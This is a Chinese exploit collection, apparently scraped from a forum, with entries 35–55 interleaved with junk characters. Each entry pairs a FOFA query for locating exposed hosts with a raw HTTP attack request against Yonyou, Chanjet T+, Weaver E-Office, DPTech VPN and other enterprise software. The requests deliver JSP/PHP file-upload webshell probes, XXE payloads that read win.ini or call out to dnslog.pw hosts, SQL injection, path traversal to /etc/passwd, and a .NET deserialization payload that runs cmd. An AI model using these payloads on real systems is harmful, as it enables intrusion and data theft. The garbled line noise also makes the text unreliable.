Accept-Encoding: gzip, deflate
9 A+ J% i4 a/ D9 {: P/ dAccept: */*# Y! e. Q, s* u( }
Connection: keep-alive
: j4 e5 a% F7 t* V6 |: Q
/ o0 h% y, i* q- ^; I
8 T; S8 a$ r# `/ Z$ ]9 U( B35. 用友NC-Cloud importhttpscer任意文件上传
8 B) J) }0 B- Y: y. XFOFA:app="用友-NC-Cloud": M4 e( s: L, b% W( \( {2 H0 ~) Y8 [
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
: e  U/ B2 `! t* m5 tHost: 203.25.218.166:8888
: A& L7 M3 |- ]! N: h( U% D: FUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info% k+ A$ i7 ^" ^! l8 H
Accept-Encoding: gzip, deflate, A9 _/ O- M6 f8 t9 s  c
Accept: */*0 Y) s: q0 {  ]5 [  l
Connection: close1 K. ?/ F, {# i$ o- w1 p$ z
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
# h: m5 R# L( d- z9 mContent-Length: 190% w/ E- t) R6 h
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
/ v1 @# T! G8 {& U0 ~! i* r' h8 b% D+ v" F
--fd28cb44e829ed1c197ec3bc71748df0
0 Y& J1 i7 p$ t+ I1 N2 \/ XContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"7 p& b# z& P- g& I& i1 l

; M9 C. I" _5 C( x1 y- C<%out.println(1111*1111);%>
4 B* ]+ _8 j! R4 ~--fd28cb44e829ed1c197ec3bc71748df0--
2 k! T# k# J- h+ h3 M
2 a$ p2 O$ d* y) O2 L! C
) d# y) s8 m- P* q6 V2 p% X36. 用友NC-Cloud soapFormat XXE
( h3 t. r  A4 t- A6 i7 NFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"3 E1 P# ~6 h; e
POST /uapws/soapFormat.ajax HTTP/1.1
, ^/ D6 d. m7 {& u% p, e( G# ]Host: 192.168.40.130:8989; Z0 o( f+ F) r4 u, O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0, w4 \" y3 c! b* S$ E# L0 s  y
Content-Length: 263
6 r& Y* D# t5 R4 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- W) _6 b% \4 [: ^* f
Accept-Encoding: gzip, deflate
( o  `8 b! T" G& F7 a" pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% X5 }, \0 b' x2 d
Connection: close4 \" k# f/ L& B+ k7 P
Content-Type: application/x-www-form-urlencoded6 q% o6 a' f( }$ x3 i
Upgrade-Insecure-Requests: 1
" X  y! G) U/ I' T& p: \* ^( E) `5 U0 E" [$ e1 C' g. K+ _
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a" J9 H/ Y9 |7 X5 Q% V# J( X6 ^
* F- E6 Q5 ~( s: q2 y  d# l
" T# a0 `6 U' {1 e
37. 用友NC-Cloud IUpdateService XXE% R# R  R5 D$ `$ _/ d3 p
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"0 U& J" P0 t2 I
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.15 I4 F+ B4 F9 Y& t
Host: 192.168.40.130:8989
$ X/ O6 W5 G" }7 e$ RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
! x! v6 |- g5 }# _3 \9 |0 |3 oContent-Length: 421
" }0 m- P5 C3 r& L0 HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9! L7 {! l' D1 h. U# K1 y, p0 M6 a% O
Accept-Encoding: gzip, deflate
0 V7 O' e9 [, yAccept-Language: zh-CN,zh;q=0.9
+ c2 f- ?9 a, t& PConnection: close
" [, P+ y: p$ L5 ~Content-Type: text/xml;charset=UTF-8
- U' G; a4 |, L1 r, [/ D0 vSOAPAction: urn:getResult
8 z1 o9 a, b3 V% MUpgrade-Insecure-Requests: 19 W6 W" k2 `: Y
& R5 F9 @- v0 L$ x0 Y4 E
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">) t2 G! X& X% O8 r8 @7 ?( F
<soapenv:Header/>
; ^( R  D7 A9 V  I$ L$ L5 k# Y<soapenv:Body>
8 I) i4 B8 S/ x& ?! ?$ u: V<iup:getResult>
& M* O5 L* N$ P) B, ^<!--type: string-->
9 C& W  \. [$ B. S( j# J$ ~# y4 \<iup:string><![CDATA[- E( e4 ^! X4 _/ l
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
8 d& A! x4 t+ `4 o9 Q<xxx/>]]></iup:string>
  ^7 g- m9 {: @9 r8 d7 j" u, R+ F2 n</iup:getResult>
$ o& K6 f% p) V. G7 ?- b8 i</soapenv:Body>& r" Y2 ]0 f  ~2 B3 G
</soapenv:Envelope>
% U" S/ C- \$ B8 W6 G3 [4 j+ e8 q# z2 t1 p0 W& z: ^6 }
1 a+ ~2 m" U( E& ]$ S

" b2 ^, H/ I: W38. 用友U8 Cloud smartweb2.RPC.d XXE
: Z; V+ v! L, k. ^+ o- y& vFOFA:app="用友-U8-Cloud"
1 e3 Y# n! y9 }; }% fPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.19 p) x) H" p4 R! t7 G! ~
Host: 192.168.40.131:80882 O4 [" ~3 ~& _, z  v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
  n6 t  M* X* uContent-Length: 260( w! L7 v0 ^+ l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3: g# ^7 ~3 m: w1 Z" @0 j
Accept-Encoding: gzip, deflate
1 H3 Q/ w6 ^' y0 c8 cAccept-Language: zh-CN,zh;q=0.9
$ G/ ]8 f" c% F$ v. W( E1 z" @Connection: close
7 I5 Y' R; T2 }- }3 p0 W3 i: F) rContent-Type: application/x-www-form-urlencoded
  O) T( H9 R$ o) D6 T& X
- R' t1 L! G$ `0 m% `0 w3 f__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
1 d9 f: M4 k2 i8 ~$ F! E3 T1 j# @- \6 R

& G. I! g& \: Y! T8 a39. 用友U8 Cloud RegisterServlet SQL注入
! }) P, `- }' e+ HFOFA:title="u8c"! A9 M8 I3 ~- w8 o' K1 }
POST /servlet/RegisterServlet HTTP/1.1
) q  }. I# |9 ?* pHost: 192.168.86.128:8089
; ?8 U1 ]# U, }) H& GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36- ]7 Z9 J- S4 ^' T1 Q( O
Connection: close
" V) m3 T8 D0 D; f0 ]! |Content-Length: 85
: `0 f: W9 ?8 h% O  y2 oAccept: */*
) u0 r& ~: L( R$ d) E/ z: {Accept-Language: en- c. D6 U% W! @, w# l% }2 r
Content-Type: application/x-www-form-urlencoded9 U" ]# g/ J/ P& ~5 V8 Z
X-Forwarded-For: 127.0.0.1' G  Q. V/ `' ]' H" `+ C2 f) ^
Accept-Encoding: gzip
, a& b  [( O$ L% ^% a9 d5 }1 ]1 o- @: v
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--* S8 I! q  E' H* W; p; }" T

: P2 k" a# O+ k4 Z" r6 ~+ k2 D5 w0 U. z7 N
40. 用友U8-Cloud XChangeServlet XXE
( S: e) u4 v0 l  z: U) A/ c/ xFOFA:app="用友-U8-Cloud"
% o" L0 i4 D/ o! f9 ePOST /service/XChangeServlet HTTP/1.19 ]& k1 ~0 P$ O
Host: x.x.x.x
+ Y& a2 T' B# T, L" ?3 w; V/ H  x* k# ~User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
# F6 {2 C5 K9 M" F7 vContent-Type: text/xml
" u, c4 u" r/ }; X! O: ?; rConnection: close
) u: n: F* g7 w$ L2 u1 g4 U; B$ `- D8 j* Q/ ~. a$ h
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
9 ], T5 Y& v  p5 E/ j1 f; G
" P3 D* c0 Y9 N5 J$ \, G3 s7 \: w" Z: C9 o2 j1 \- a
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入3 S, a" b4 p! E, ^9 d
FOFA:app="用友-U8-Cloud"
3 g: Q+ m" C0 CGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
1 N- B3 b/ E" z, E3 {' uHost:; F: R* J' @5 o) I( M, _% Z- r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 b' z4 C, O$ u1 g' L" k5 R; k
Content-Type: application/json
* e* i$ S0 h) S! w  R8 S& y8 bAccept-Encoding: gzip$ K4 n: v8 i$ P4 B5 C( L
Connection: close
- k+ B9 g% G& ?0 w! q& q  ]: |3 a' a* ~
/ ]/ Y/ L9 c: B
42. 用友GRP-U8 SmartUpload01 文件上传
9 c- j0 I7 y7 E  P' K5 |FOFA:app="用友-GRP-U8"
1 Z% X0 V' ~  \; \% J' K$ Y; G8 G2 gPOST /u8qx/SmartUpload01.jsp HTTP/1.1
& t6 ~, Z& E% U4 Z( X$ m; n4 B0 `Host: x.x.x.x
! W9 p: P* k5 ?8 L  I  oContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt( N( r' T* Q! |, a. A5 t  n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36) f, m: ^! v9 v5 D! z
# C2 c0 M- f4 _$ j; B& ]' D2 d' S
PAYLOAD
' b9 U5 c/ R2 \5 [7 _5 }$ ^; N5 X" U1 F7 B5 X9 [
6 w, w8 T; j3 S$ ^! V
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
8 n) F$ T  i  _, P
* T5 q% a' j" k43. 用友GRP-U8 userInfoWeb SQL注入致RCE
/ k5 r2 W) x9 m8 `/ L3 \5 xFOFA:app="用友-GRP-U8"# H$ v# e+ f# A4 H1 m; j
POST /services/userInfoWeb HTTP/1.1
8 P1 B2 Q4 s9 e; w" B1 g& T7 @# CHost: your-ip
) ~1 a+ Q$ V4 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 M8 Z; b$ f; \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% u* `$ l$ Q' t- f: S/ B
Accept-Encoding: gzip, deflate
6 b+ \* M5 f/ R. D2 g0 rAccept-Language: zh-CN,zh;q=0.9
6 n4 m; Z# e. U8 nConnection: close
6 g" T' E( }/ _7 v3 \) N& cSOAPAction:
) ?/ q, h% O$ F1 c6 \Content-Type: text/xml;charset=UTF-8
2 Q6 q- i* y( K3 X  i' X% d: D. O7 u& H" U# H. z
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">) Z- d* Z2 N# H& \8 _. g/ P5 H8 h( C
   <soapenv:Header/>8 f. [9 z9 {" D5 A+ K2 ~% ~
   <soapenv:Body>" m4 n- ]- O  K1 z. N
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
* g1 d) o9 W  Q1 k. N8 J. h         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>) C0 a% S  O+ v$ I4 P4 F- w
      </ser:getUserNameById>
1 O0 f' @: w4 z7 b   </soapenv:Body>1 |. c4 _. _# j  C
</soapenv:Envelope>9 F/ s0 r# p" t8 Y/ ~
" \0 p8 ^; |  D
  u' h' g4 M+ m, l0 D
44. 用友GRP-U8 bx_dj_check.jsp SQL注入3 a* w: c( A* g. ~; Q7 X% Z
FOFA:app="用友-GRP-U8"
! c* _$ d1 L# d, [3 _7 a" Y2 `GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
2 \$ v3 q3 Z  a. [2 y; w. Z5 fHost: your-ip8 R0 {) r8 `* y3 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.366 \/ s2 [% Z, |- j) c* ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* j- C  W+ u$ ?) M3 {
Accept-Encoding: gzip, deflate
6 z7 F3 j, u. {$ C$ e1 V" k, ]Accept-Language: zh-CN,zh;q=0.9" z2 `7 d% `1 k4 h9 N$ @4 d8 F/ P$ ~
Connection: close+ ]+ g; J# Y" U8 ?; u. s3 o+ d/ \

7 f3 s: f. V( T3 B, p  m  t" W
3 j! j6 g" Q: j45. 用友GRP-U8 ufgovbank XXE: R' F/ B/ `# \- V9 w
FOFA:app="用友-GRP-U8"
5 b: E, x& C; g; RPOST /ufgovbank HTTP/1.12 |- b/ k+ ]$ L& h: b3 w7 C, E; r
Host: 192.168.40.130:222
$ @, v0 b, u) G6 }0 c2 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
6 p. H8 m' r' b7 _6 t/ D; YConnection: close
1 W' k% c& F$ [Content-Length: 161
3 r+ w/ ~. l2 R! I. H# {4 E7 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) _$ p# X3 Q) z# D5 ^; y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 E2 k3 ]9 k! d% t$ D& V7 P! YContent-Type: application/x-www-form-urlencoded
' K- E5 d6 n7 F- [Accept-Encoding: gzip
, i/ `- X) J* C: o/ X3 a- }6 E. S% G. V
reqData=<?xml version="1.0"?>1 h7 }& g: q7 q! T) R( I2 X$ \
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
! D5 E2 |3 Z* ?; A, m
1 N' F6 {+ n, C; l) R
# U8 @1 M( P$ Y5 Y* W- @46. 用友GRP-U8 sqcxIndex.jsp SQL注入
+ D5 X' M; d" P- B& j- P  jFOFA:app="用友-GRP-U8"
- E  W! O  U/ n2 J6 hGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
$ p, e. W( t& l# j; O8 Y3 sHost: your-ip
' s8 F7 s+ i( mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
8 k/ Y) f1 `" t7 M; m; K& DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# E# B1 a7 g: N$ p. x  lAccept-Encoding: gzip, deflate
/ e9 |1 {' ]8 b5 V1 L2 KAccept-Language: zh-CN,zh;q=0.90 ~: _7 \" j, i2 @- |; e
Connection: close
# I" }: S# l% S# `4 Z& @+ s) I) d. f1 s4 M* D$ |. J
' j: F! R7 i( Z  Y! |, Z, }
47. 用友GRP A++Cloud 政府财务云 任意文件读取# t: @: E1 ^/ R7 ]+ x2 G
FOFA:body="/pf/portal/login/css/fonts/style.css"+ Z* t+ X  {: w" Q% F
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
( z* X" r9 ~# u3 y  K3 L6 Z( oHost: x.x.x.x2 D" A. c/ C4 z% L- ]
Cache-Control: max-age=08 {3 c( P+ D* F
Upgrade-Insecure-Requests: 1- Z6 g  i% n6 s) D9 I% O: ~( m, G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36  M5 H) `; A0 K; Y! X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& I; \1 K/ p. Y, D' [1 L! _6 v
Accept-Encoding: gzip, deflate, br  V! R9 G8 D. h
Accept-Language: zh-CN,zh;q=0.9" X6 ]5 g4 l8 |) P3 a
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT6 M# U( a9 o- Y, z
Connection: close9 [4 b; a  h, S- ?" V. g
1 I$ j) H" H; _2 g  m
" l. R1 v( s6 g& n5 o2 h

/ K; y9 @) z% _7 F* ?8 [$ S" e, w/ y0 l48. 用友U8 CRM swfupload 任意文件上传
! W* E5 t( F& v( m: V1 ?8 WFOFA:title="用友U8CRM"
$ p/ t' Q( h% r! l3 v7 @( ~POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
. W1 }; y- M( @3 E5 X. _. XHost: your-ip8 p  ?4 i: q7 |) Z- j5 q4 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.08 z( [& i' H! Q% m$ @- N2 i: o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' A0 K! W* D7 Y* c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, ~' F3 g3 m; h0 ?  rAccept-Encoding: gzip, deflate
, a/ h- I( ^% L3 q; e+ tContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
; p  _' @6 {0 a- q------269520967239406871642430066855* p* x3 c8 p' l! q; ^
Content-Disposition: form-data; name="file"; filename="s.php"5 }4 |7 E4 P) d. b! ~1 z
1231, u" T5 W4 T: l! K+ @
Content-Type: application/octet-stream
: i7 Q0 V' [  j& M  ~* z6 e" o------269520967239406871642430066855
' D4 @$ P: r7 ?3 `Content-Disposition: form-data; name="upload"
$ x# ]3 b4 D( Y5 I5 \1 ^3 Dupload2 ]* C% a7 O) t) {( v
------269520967239406871642430066855--( z+ z, v; {8 M8 a( [

0 F) @) f* D1 L; n! J7 @8 q" k2 ]5 m4 ]. Z
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
: w, e- r. [6 F/ l: ZFOFA:body="用友U8CRM"7 J# t$ |" s% v% O# j" C
8 }6 T" x0 P/ D$ d2 X: o# f
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1; U8 }* j2 g& i+ P# c5 _& r& o
Host: x.x.x.x
7 P! T" s2 R7 Q0 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.06 u9 F9 @  O4 X* l; L" Q
Content-Length: 329
  P+ J$ A! F2 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# M+ T, w  t; a! Q* j1 j" S1 HAccept-Encoding: gzip, deflate; M9 ]2 q( X) Y8 U  A0 n! ^/ N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 n7 k' @5 g4 c
Connection: close  d7 j. i  F4 u! N  a$ ]
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w2 h! F' ~& T: y$ T+ O& E2 S9 G- |

* [2 T1 q) i+ U  x-----------------------------vvv3wdayqv3yppdxvn3w
: h. r: C7 r" g2 q' e* N1 k/ C: N0 gContent-Disposition: form-data; name="file"; filename="%s.php "
0 c( X, S8 l( [' A5 _: H' W, dContent-Type: application/octet-stream" _4 ?: @+ V4 k2 z- f

0 M! w, B, G- o5 Ywersqqmlumloqa
% D, H; g" V8 _7 f1 _* d-----------------------------vvv3wdayqv3yppdxvn3w
) `5 n( [6 Z. OContent-Disposition: form-data; name="upload"* y* W4 [" ?1 ]* T1 U8 i

+ j- M. C9 z" E7 T1 S& a) ?upload
& X  m- v9 L9 ^3 k) B' |-----------------------------vvv3wdayqv3yppdxvn3w--
% H) }& g/ R# E- S  U) z* Q: ]7 v% p. p, w, B

; H3 I" c' a# Dhttp://x.x.x.x/tmpfile/updB3CB.tmp.php; w9 v% o/ ~+ z# d: P5 \1 \
5 h$ K4 p5 R# a1 z( P+ O9 \
50. QDocs Smart School 6.4.1 filterRecords SQL注入
4 J# U/ g' T% O' q) p2 \FOFA:body="close closebtnmodal"
* X; u6 S; h8 \; w+ {POST /course/filterRecords/ HTTP/1.1
% j* y5 {3 `3 [& K9 A$ SHost: x.x.x.x
0 q" {2 r( W% Y. g' n" Q" ^5 q& sUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
9 Q) P8 g. [0 e5 UConnection: close
+ W$ M1 i9 Z% zContent-Length: 224/ S, I( }) s8 a1 k, {* }
Accept: */** E% T+ S9 j/ y( e: y# h# c
Accept-Language: en
# l4 A6 m! |- g, M+ ZContent-Type: application/x-www-form-urlencoded7 u# V6 z4 q" G+ a7 a7 {* j2 ?0 n% S
Accept-Encoding: gzip* H& H8 D# g/ V% h( c. [
/ M4 P# I9 m" ], C' A+ k
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
6 \+ m4 N" W( {' Q/ F1 T7 O% J
  H( c, F/ N9 t' m) W) k0 u8 w0 V  s" H( P" Q/ v% I4 ^
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
- X: b% P+ Q/ a6 e1 a  a8 gFOFA:app="云时空社会化商业ERP系统"
6 v' r# h# G% [2 nGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1) X+ g" e' B) ~0 E$ _
Host: your-ip$ k# c$ [0 h8 S) V
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.369 Q8 ?( N: C# A$ G8 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
3 @8 b2 w" b2 PAccept-Encoding: gzip, deflate
1 N$ n: Y1 m$ E  n( v; VAccept-Language: zh-CN,zh;q=0.9
5 G8 S! w3 v4 w' R5 CConnection: close
% p' ]9 E7 N: K' i: b+ ^9 U/ j' W! W/ h  J
5 A7 z! i( x5 j! m, `
52. 泛微E-Office json_common.php sql注入
4 B* ?+ M' c2 Q6 E$ k( j8 }) j/ KFOFA:app="泛微-EOffice"  C5 u9 b. n6 N( S7 p4 r; `
POST /building/json_common.php HTTP/1.1, |. p! ?5 k* @- }7 ^1 M0 I
Host: 192.168.86.128:8097" p0 s8 w- L' j( }" ^- ]* p3 q/ Z
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 v# \& J6 l" ~; [Connection: close- @8 B1 U9 B9 z8 c5 K5 n! w+ W
Content-Length: 87
5 x9 R" W$ e6 Z  I" WAccept: */*
% t5 D# m3 @1 p! [. j1 s0 K7 K' zAccept-Language: en
! B$ T$ q! p' dContent-Type: application/x-www-form-urlencoded3 z3 t  C! ~. m) U0 H+ w
Accept-Encoding: gzip
2 j9 q5 A- O$ q7 q$ }, C4 P
2 T) H( l- F$ s0 g6 I: g; v1 ztfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3331 M7 c( V" c3 |: X4 q

" a) i  n% m5 b- y" j0 M7 t6 k: E7 z  r6 ]. ]7 b
53. 迪普 DPTech VPN Service 任意文件上传
( Z8 _7 ]% Q$ n3 R) |8 ^+ }4 kFOFA:app="DPtech-SSLVPN"
. q1 `$ T2 k' [" T7 r/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd3 j) `" w# m2 p& w
" I5 k: w  W# \* ~/ N+ Y* O" K3 l

  x) w# R& h# i1 V7 Y# z6 c5 k* n) Y54. 畅捷通T+ getstorewarehousebystore 远程代码执行
; Q- F" ~3 y+ |" v, A( RFOFA:app="畅捷通-TPlus"6 n: K  }7 a9 J) r8 \2 P* O% o
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
$ f2 x  y: }3 V0 L! e"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"* S& O$ I2 {- X( I8 x

, D* d+ d8 O/ Z7 W( a4 t
% l. l  s7 h  K) y+ K: E6 f完整数据包2 y0 n% ~; C+ C3 B- k
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1" c9 w& W8 j0 U
Host: x.x.x.x
" O* Q6 [1 t6 _User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F7 ]' t4 n% L" M
Content-Length: 593# `  i2 |( A& P5 V
$ x! z8 e3 \) q; R
{# i5 K5 G" ?) u) R" y! p& D6 k! d
"storeID":{( e& R, |6 ?9 X# b0 z
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
+ J  l( n* p" `! i# { "MethodName":"Start",! C3 V9 p1 S9 n5 n8 ]* o- n1 B
  "ObjectInstance":{; R5 A9 R; h1 I3 ^3 P) g
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",' a7 a$ c" T0 [
    "StartInfo":{, ?4 U  q# k0 ?: w
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",+ J( W2 D0 q+ I# ]
    "FileName":"cmd",
# Y# n& Q2 ~7 R    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
  d& Z. K/ W" ]9 S    }
0 z3 O+ Y4 U3 i3 [5 w  }/ _; D( U7 \1 f2 x3 ]0 S
  }+ G- B) v9 N  W% i# [
}
4 q/ y* k. U7 ?; c# U
; R6 C/ S' ^/ H  a8 t
) x# k" w; E! c5 ^; H第二步,访问如下url% Y' ^. r; ^7 ]: Z+ t* V8 s2 ]
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
! c6 Y6 K9 Y8 |) L4 y( U$ a0 ?3 i4 q2 g! \" T5 K

7 N" e) r1 ?3 [" i, O55. 畅捷通T+ getdecallusers信息泄露
- i2 }) Q- N: D' ]$ j9 bFOFA:app="畅捷通-TPlus"" a' t8 k7 K0 z: j
第一步,通过0 q( u$ L- X' A' S
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie) L. i' U; G  O' t( u* M
第二步,利用获取到的Cookie请求
, C) \; ~- t* n1 `/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
